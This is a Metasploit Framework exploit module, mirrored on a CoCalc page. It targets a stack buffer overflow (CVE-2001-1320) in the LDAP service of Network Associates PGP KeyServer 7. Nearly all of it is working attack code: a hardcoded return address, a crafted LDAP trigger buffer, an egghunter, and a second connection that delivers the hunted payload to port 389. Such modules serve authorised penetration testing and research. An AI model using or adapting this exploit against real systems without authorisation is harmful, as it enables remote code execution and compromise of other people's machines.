CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ldap/pgp_keyserver7.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Egghunter

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'Network Associates PGP KeyServer 7 LDAP Buffer Overflow',

15
      'Description'    => %q{

16
          This module exploits a stack buffer overflow in the LDAP service that is

17
          part of the NAI PGP Enterprise product suite. This module was tested

18
          against PGP KeyServer v7.0. Due to space restrictions, egghunter is

19
          used to find our payload - therefore you may wish to adjust WfsDelay.

20
      },

21
      'Author'         => [ 'aushack' ],

22
      'License'        => MSF_LICENSE,

23
      'References'     =>

24
        [

25
          [ 'CVE', '2001-1320' ],

26
          [ 'OSVDB', '4742' ],

27
          [ 'BID', '3046' ],

28
          [ 'URL', 'http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/' ],

29
        ],

30
      'Privileged'     => true,

31
      'Payload'        =>

32
        {

33
          'Space'    => 450,

34
          'BadChars' => "\x00\x0a\x0d\x20",

35
          'StackAdjustment' => -3500,

36
        },

37
      'Platform'       => 'win',

38
      'Targets'        =>

39
        [

40
          ["Universal PGPcertd.exe", { 'Ret' => 0x00436b23 }], # push esp; ret PGPcertd.exe - patrick tested ok 2k/xp

41
        ],

42
      'DisclosureDate' => '2001-07-16',

43
      'DefaultTarget' => 0))

44


45
    register_options(

46
      [

47
        Opt::RPORT(389)

48
      ])

49
  end

50


51
  def exploit

52
    connect

53


54
    # - Maximum payload space is 102 so we use EggHunter instead.

55
    # - The PAYLOAD is put inside an invalid, rejected (but hunt-able) request.

56


57
    hunter	= generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })

58
    egg	= hunter[1]

59


60
    eggstart = "\x30\x82\x01\xd9\x02\x01\x01\x60\x82\x01\xd2\x02\x01\x03\x04\x82\x01\xc9" # ldapsearch sniff

61
    eggend = "\x80\x00"

62


63
    print_status("Sending trigger and hunter first...")

64


65
    buf = "\x30\xfe\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x02\x0a\x01\x00\x02\x01\x00" # PROTOS suite sniff

66
    buf << [target['Ret']].pack('V') + hunter[0]

67
    buf << "\x00"

68


69
    sock.put(buf)

70


71
    disconnect

72


73
    connect

74


75
    print_status("Sending hunted payload...")

76
    sock.put(eggstart+egg+eggend)

77


78
    handler

79
    disconnect

80
  end

81
end

82


83